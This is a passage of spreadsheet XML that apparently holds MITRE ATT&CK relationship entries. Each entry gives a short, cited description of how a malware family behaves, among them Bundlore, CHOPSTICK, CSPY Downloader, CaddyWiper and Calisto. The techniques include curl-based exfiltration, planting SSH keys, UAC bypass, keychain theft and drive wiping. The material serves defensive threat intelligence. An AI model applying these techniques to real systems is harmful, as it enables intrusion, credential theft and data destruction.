  <si>
    <t>relationship--2ee78986-9275-4248-9fde-125c3312b657</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) uses the &lt;code&gt;curl -s -L -o&lt;/code&gt; command to exfiltrate archived data to a URL.(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>relationship--0c994569-1793-4d11-821e-bbf7c6c98278</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) prompts the user for their credentials.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>relationship--9480dac9-9192-4966-a622-0ca561b59f16</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) uses the &lt;code&gt;mktemp&lt;/code&gt; utility to make unique file and directory names for payloads, such as &lt;code&gt;TMP_DIR=`mktemp -d -t x&lt;/code&gt;.(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>relationship--2a4447dc-811d-487a-ade9-ef11e6e24e16</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can download and execute new versions of itself.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>relationship--6b69d848-b3d9-4f8f-96dc-381e1dd793d4</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can execute JavaScript by injecting it into the victim's browser.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>relationship--d70ae3e8-39e2-4835-9ba6-56dee8d028fc</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can persist via a LaunchAgent.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>relationship--72df7e88-84ce-449b-ae0f-a8ceb9316964</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can persist via a LaunchDaemon.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>relationship--a9f9bef5-31f0-44bf-bba5-4c13a5eda5ac</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) changes the permissions of a payload using the command &lt;code&gt;chmod -R 755&lt;/code&gt;.(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>relationship--f19f6015-ffbe-4998-ad82-403fcfc2e649</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has attempted to get users to execute a malicious .app file that looks like a Flash Player update.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>relationship--a77d7668-db79-46b0-960a-cfa39db781fa</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has disguised a malicious .app file as a Flash Player update.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>relationship--10c609ce-f256-436c-8288-3441cb123fc5</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has obfuscated data with base64, AES, RC4, and bz2.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>relationship--885c54e7-6b1c-4399-a051-1e0b047d6f92</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has used the &lt;code&gt;ps&lt;/code&gt; command to list processes.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>relationship--1e10af38-1695-45ab-8db2-8cd476a58a45</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has used Python scripts to execute payloads.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>relationship--677878af-62d4-4407-bbe6-551b7906a366</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) creates a new key pair with &lt;code&gt;ssh-keygen&lt;/code&gt; and drops the newly created user key in &lt;code&gt;authorized_keys&lt;/code&gt; to enable remote login.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>relationship--6723c87e-f60a-465f-96cd-78d63d17ba01</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has the ability to enumerate what browser is being used as well as version information for Safari.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>relationship--91038a74-575b-4f2e-9dba-767b50b8e4ab</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) will enumerate the macOS version to determine which follow-on behaviors to execute using &lt;code&gt;/usr/bin/sw_vers -productVersion&lt;/code&gt;.(Citation: MacKeeper Bundlore Apr 2019)(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>relationship--132c7780-3fa4-478b-b037-f2c1ad99d98f</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has leveraged /bin/sh and /bin/bash to execute commands on the victim machine.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>relationship--2063f611-1da2-4a62-bbb6-38b37580679f</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) uses HTTP requests for C2.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>relationship--fbbaf901-4d1a-41e0-9040-78185113ffdf</t>
  </si>
  <si>
    <t>The [CALENDAR](https://attack.mitre.org/software/S0025) malware communicates through the use of events in Google Calendar.(Citation: Mandiant APT1)(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--2244e21e-b7f6-476f-8f58-67db772f9736</t>
  </si>
  <si>
    <t>[CALENDAR](https://attack.mitre.org/software/S0025) has a command to run cmd.exe to execute commands.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--121d2e76-5ba1-475d-9cf9-1046724abae1</t>
  </si>
  <si>
    <t>S0465</t>
  </si>
  <si>
    <t>CARROTBALL</t>
  </si>
  <si>
    <t>tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) has the ability to use FTP in C2 communications.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>relationship--4b569311-24d2-439d-badb-a5076955cda3</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) has the ability to download and install a remote payload.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>relationship--6d5221c3-2efa-4374-8842-8c955fda112b</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) has been executed through users being lured into opening malicious e-mail attachments.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>relationship--7c9b61d8-30ff-4594-9cfb-90f2db44ca0e</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) has used a custom base64 alphabet to decode files.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>relationship--d8557c07-240a-4dbb-b372-1111a05a5303</t>
  </si>
  <si>
    <t>S0462</t>
  </si>
  <si>
    <t>CARROTBAT</t>
  </si>
  <si>
    <t>malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to execute obfuscated commands on the infected host.(Citation: Unit 42 CARROTBAT November 2018)</t>
  </si>
  <si>
    <t>relationship--856aff2c-9289-4c45-ade7-24cb3c338003</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to delete downloaded files from a compromised host.(Citation: Unit 42 CARROTBAT November 2018)</t>
  </si>
  <si>
    <t>relationship--ec0f8f62-0eb6-4d40-a8c2-c3a083a79acd</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to download and execute a remote file via [certutil](https://attack.mitre.org/software/S0160).(Citation: Unit 42 CARROTBAT November 2018)</t>
  </si>
  <si>
    <t>relationship--9e81f24e-6f72-44eb-9f19-2a3e7dca14ad</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to download a base64 encoded payload.(Citation: Unit 42 CARROTBAT November 2018)</t>
  </si>
  <si>
    <t>relationship--fd37b358-d005-4662-a200-771f89d491f4</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>relationship--0b37289c-b118-45f7-98b2-5efe06cbf0b2</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to execute command line arguments on a compromised host.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>relationship--31864818-132a-48c8-ac12-723463d4f8dc</t>
  </si>
  <si>
    <t>S0222</t>
  </si>
  <si>
    <t>CCBkdr</t>
  </si>
  <si>
    <t>malware--b0f13390-cec7-4814-b37c-ccec01887faa</t>
  </si>
  <si>
    <t>[CCBkdr](https://attack.mitre.org/software/S0222) was added to a legitimate, signed version 5.33 of the CCleaner software and distributed on CCleaner's distribution site.(Citation: Talos CCleanup 2017)(Citation: Intezer Aurora Sept 2017)(Citation: Avast CCleaner3 2018)</t>
  </si>
  <si>
    <t>relationship--9b650df6-f965-45fa-9e5a-409202a46da7</t>
  </si>
  <si>
    <t>[CCBkdr](https://attack.mitre.org/software/S0222) can use a DGA for [Fallback Channels](https://attack.mitre.org/techniques/T1008) if communications with the primary command and control server are lost.(Citation: Talos CCleanup 2017)</t>
  </si>
  <si>
    <t>relationship--cd24838b-45b2-405d-b932-9ac49eca8d4a</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) encrypts C2 communications with TLS.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--f3b8a97f-4e9c-4190-be08-467d136fc943</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) is capable of performing remote command execution.(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--2fa20fad-4ede-42f4-8ce5-7f5a6ce83ed8</t>
  </si>
  <si>
    <t>14 May 2019</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</si>
  <si>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</si>
  <si>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relationship--167d7b11-01f3-42d5-bb8a-78306dc80243</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) can use a DGA for [Fallback Channels](https://attack.mitre.org/techniques/T1008), domains are generated by concatenating words from lists.(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>relationship--a72ce53b-311d-43f2-b145-784c322306c1</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) can switch to a new C2 channel if the current one is broken.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--101867a2-149c-4088-a90f-7af4b86e5013</t>
  </si>
  <si>
    <t>An older version of [CHOPSTICK](https://attack.mitre.org/software/S0023) has a module that monitors all mounted volumes for files with the extensions .doc, .docx, .pgp, .gpg, .m2f, or .m2o.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--838b4a52-1360-4ca7-ab25-1b549508e687</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) may store RC4 encrypted configuration information in the Windows Registry.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--8a6bfa36-adff-402d-9913-be2e45bc22aa</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) is capable of performing remote file transmission.(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>relationship--731710ae-a6b9-47b7-b8b2-8526ce60be2f</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) used a proxy server between victims and the C2 server.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--252c0e02-0da6-4812-b147-81d9cfb3c998</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) is capable of performing keylogging.(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 2)(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>relationship--954961e4-0bf5-496e-b200-e63d99c006de</t>
  </si>
  <si>
    <t>Various implementations of [CHOPSTICK](https://attack.mitre.org/software/S0023) communicate with C2 over SMTP and POP3.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--31462755-d050-4875-9d0b-0a7eeb276326</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) may modify Registry keys to store RC4 encrypted configuration information.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--40a8f80d-5497-4218-849c-3c0b63796641</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) provides access to the Windows Registry, which can be used to gather information.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--f55d54fe-27ed-41f9-81db-11ccbe2d2125</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</si>
  <si>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</si>
  <si>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relationship--9aeda7e2-e452-4cd3-837f-e258cba1fc96</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) has the capability to capture screenshots.(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>relationship--7201204c-d21f-4560-a3d1-c75fabacb4c4</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) checks for antivirus and forensics software.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--765e3b13-60f4-4b34-b03f-0d8e738b0add</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) encrypts C2 communications with RC4.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--f29a3a93-e697-4d6f-8087-eec72856bae5</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023)  includes runtime checks to identify an analysis environment and prevent execution on it.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--5edc2d20-2e9a-4587-9656-dfe38eb1d66d</t>
  </si>
  <si>
    <t>Various implementations of [CHOPSTICK](https://attack.mitre.org/software/S0023) communicate with C2 over HTTP.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>relationship--3a9abcd5-52ba-44f1-96a5-1593f816b9f0</t>
  </si>
  <si>
    <t>[CORALDECK](https://attack.mitre.org/software/S0212) has created password-protected RAR, WinImage, and zip archives to be exfiltrated.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--948d9203-f418-4cf6-9618-e1e89f1ef2bb</t>
  </si>
  <si>
    <t>[CORALDECK](https://attack.mitre.org/software/S0212) has exfiltrated data in HTTP POST headers.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--499b83f9-ba2a-4de3-a143-ed85677a453d</t>
  </si>
  <si>
    <t>[CORALDECK](https://attack.mitre.org/software/S0212) searches for specified files.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--a00bb928-c644-4b77-ae9c-18c3165daa00</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) contains unused machine instructions in a likely attempt to hinder analysis.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--9b88372d-4f3f-4442-906d-9ab07e22e781</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) downloads another dropper from its C2 server.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--e41ab3e7-2b69-4461-a693-e53a24c9ab59</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) can communicate over SMTP and POP3 for C2.(Citation: FireEye APT28)(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>relationship--17049a4f-810d-4928-a0a0-84d4a732ca08</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) obfuscates strings using a custom stream cipher.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--e6f5bde4-869f-4c9a-9414-11ea48386204</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</si>
  <si>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</si>
  <si>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relationship--dcc2c503-25dc-47bb-b9cb-35ce27e73cd2</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) is installed via execution of rundll32 with an export named "init" or "InitW."(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>relationship--ccc38b61-c517-4186-909a-760f12ef65e8</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) C2 messages are Base64-encoded.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--35d35ecf-1326-4690-b105-23280e29c120</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) C2 messages are encrypted with custom stream ciphers using six-byte or eight-byte keys.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--f4e53b40-abcf-4157-9e53-4ab9632619f1</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) collects hostname, volume serial number and OS version data from the victim and sends the information to its C2 server.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--5301c007-7c00-4b4d-b355-864db8de052f</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) can communicate over HTTP for C2.(Citation: FireEye APT28)(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>relationship--167e1e15-1fe1-4073-aac1-062557fdd79f</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can bypass UAC using the SilentCleanup task to execute the binary with elevated privileges.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--ae0b54d4-8aac-400a-ab6a-9656144c77cc</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has come signed with revoked certificates.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--5c7bb53e-d396-4b7e-a925-4a928acc0762</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has the ability to self delete.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--0d388cf6-adcd-4708-8203-cea7180340b0</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has the ability to remove values it writes to the Registry.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--df1cdf5d-aaca-4a6f-ac5f-2506df830f62</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can download additional tools to a compromised host.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--6213e3cf-c18e-47de-b281-07aa3c3179db</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has been delivered via malicious documents with embedded macros.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--63e937c3-f395-4146-8061-6c00550bcd6a</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has attempted to appear as a legitimate Windows service with a fake description claiming it is used to support packed applications.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--62a81aa2-bba1-47f3-81bc-ddc1912e2540</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can write to the Registry under the &lt;code&gt;%windir%&lt;/code&gt; variable to execute tasks.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--4d58ff48-b6d8-48ba-aa29-2f34d4dc1264</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can use the schtasks utility to bypass UAC.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--509a79e0-7ee3-4528-b11a-eefee861e384</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) has been packed with UPX.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--d9d86c0c-6ee9-4fdc-bb9b-6d331a44bbde</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can search loaded modules, PEB structure, file paths, Registry keys, and memory to determine if it is being debugged or running in a virtual environment.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--d9a49337-e1a4-49ee-b0f1-ef80c7c37a99</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) can use GET requests to download additional payloads from C2.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--63297ca0-f552-417a-9a1f-ee497cce1bc3</t>
  </si>
  <si>
    <t>[Cachedump](https://attack.mitre.org/software/S0119) can extract cached password hashes from cache entry information.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--5c6b3fda-2eec-4c7a-af09-5f880f260085</t>
  </si>
  <si>
    <t>S0693</t>
  </si>
  <si>
    <t>CaddyWiper</t>
  </si>
  <si>
    <t>malware--b30d999d-64e0-4e35-9856-884e4b83d611</t>
  </si>
  <si>
    <t>[CaddyWiper](https://attack.mitre.org/software/S0693) can work alphabetically through drives on a compromised system to take ownership of and overwrite all files.(Citation: ESET CaddyWiper March 2022)(Citation: Cisco CaddyWiper March 2022)</t>
  </si>
  <si>
    <t>relationship--a65cc371-4fa4-48e9-b95d-22ac81d67085</t>
  </si>
  <si>
    <t>[CaddyWiper](https://attack.mitre.org/software/S0693) has the ability to destroy information about a physical drive's partitions including the MBR, GPT, and partition entries.(Citation: ESET CaddyWiper March 2022)(Citation: Cisco CaddyWiper March 2022)</t>
  </si>
  <si>
    <t>relationship--f9bcef0c-01a5-4fd8-a6f1-8423b5e98e52</t>
  </si>
  <si>
    <t>17 April 2022</t>
  </si>
  <si>
    <t>[CaddyWiper](https://attack.mitre.org/software/S0693) can enumerate all files and directories on a compromised host.(Citation: Malwarebytes IssacWiper CaddyWiper March 2022 )</t>
  </si>
  <si>
    <t>relationship--827b0e8c-857b-4ccd-b0ef-4effe2bb7fb0</t>
  </si>
  <si>
    <t>[CaddyWiper](https://attack.mitre.org/software/S0693) has the ability to dynamically resolve and use APIs, including `SeTakeOwnershipPrivilege`.(Citation: Cisco CaddyWiper March 2022)</t>
  </si>
  <si>
    <t>relationship--eab5970e-e491-44e6-90a2-203d9a7b4042</t>
  </si>
  <si>
    <t>[CaddyWiper](https://attack.mitre.org/software/S0693) can obtain a list of current processes.(Citation: Malwarebytes IssacWiper CaddyWiper March 2022 )</t>
  </si>
  <si>
    <t>relationship--ef8d7ed3-805a-4edd-a4e9-74c6520594de</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</si>
  <si>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</si>
  <si>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relationship--6b7ef377-d7c3-47ca-9707-03d4ccaf5adb</t>
  </si>
  <si>
    <t>[CaddyWiper](https://attack.mitre.org/software/S0693) can modify ACL entries to take ownership of files.(Citation: Cisco CaddyWiper March 2022)</t>
  </si>
  <si>
    <t>relationship--79fb0138-8963-4951-a778-fc9b90150851</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to identify open windows on the compromised host.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>relationship--13e89239-af0e-4f3c-9bb9-42b113f64873</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to compress stolen data into a .cab file.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>relationship--59ad51ee-bc2e-4428-be3f-ddf50cf0deb9</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to record audio from the compromised host.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>relationship--721b7c0a-4774-4b09-882f-be7ba1cab7a5</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to steal data from the clipboard.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>relationship--5c859db1-13ba-4bf8-a8d3-7fd99e061c45</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to log keystrokes on the compromised host.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>relationship--26339d57-98d9-4323-97e8-03642f82e245</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to steal information about printers and the documents sent to printers.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>relationship--dfdd269c-9d78-46da-8b31-3141a5398bfd</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to capture screenshots and webcam photos.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>relationship--dd812f2c-a0a0-4543-af23-25e71c899bf4</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to discover information about the compromised host.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>relationship--d826904c-7853-4f85-a5e4-948b21ae374c</t>
  </si>
  <si>
    <t>S0274</t>
  </si>
  <si>
    <t>Calisto</t>
  </si>
  <si>
    <t>malware--b8fdef82-d2cf-4948-8949-6466357b1be1</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) adds permissions and remote logins to all users.(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>relationship--fe56443a-5f0b-4120-9d27-d4d98aae69b8</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) uses the &lt;code&gt;zip -r&lt;/code&gt; command to compress the data collected on the local system.(Citation: Securelist Calisto July 2018)(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>relationship--cca64a18-4601-4169-9a8e-63036403940f</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) collects information on bookmarks from Google Chrome.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>relationship--0fd71bed-d22f-44f8-aef2-4c5e55aca422</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) can collect data from user directories.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>relationship--7e8293be-b9d6-4a27-8d49-216f17df3bd0</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) has the capability to use &lt;code&gt;rm -rf&lt;/code&gt; to remove folders and files from the victim's machine.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>relationship--a9c1c589-b5c6-4231-982f-cae0aa41f349</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) presents an input prompt asking for the user's login and password.(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>relationship--7566c29c-f071-40fa-a437-34d2f36eadb6</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration.(Citation: Securelist Calisto July 2018)(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>relationship--d4784901-968c-4fb1-b0d3-0268d4c40582</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) has the capability to upload and download files to the victim's machine.(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>relationship--406257ac-ff42-4e15-b72e-50202e38b675</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) collects Keychain storage data and copies those passwords/tokens to a file.(Citation: Securelist Calisto July 2018)(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>relationship--d22b326c-ceaf-424b-b263-e0830bab9bf3</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) adds a .plist file to the /Library/LaunchAgents folder to maintain persistence.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>relationship--02e0a0a6-2b51-4266-ba4e-1af344f20f62</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) uses launchctl to enable screen sharing on the victim’s machine.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>relationship--bb371ea5-33c4-42e7-bcb0-3374240da553</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) has the capability to add its own account to the victim's machine.(Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>relationship--fe99ee01-a049-4867-bf3b-27d05461b0b3</t>
  </si>
  <si>
    <t>relationship--dbdf85ca-504d-40f9-9023-ce8acdf99781</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274)'s installation file is an unsigned DMG image under the guise of Intego’s security solution for mac.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>relationship--cfa19bf2-af5e-4050-a3d9-fbd9684b867e</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) runs the &lt;code&gt;ifconfig&lt;/code&gt; command to obtain the IP address from the victim’s machine.(Citation: Securelist Calisto July 2018)</t>
  </si>
  <si>
    <t>relationship--34cb97d2-b8ae-46e8-a8f7-caca4214820e</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) exfiltrates data to its C2 server over the same protocol as C2 communications.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--dbb1d0eb-c7ee-4794-80d4-66e6281cbc63</t>
  </si>
  <si>
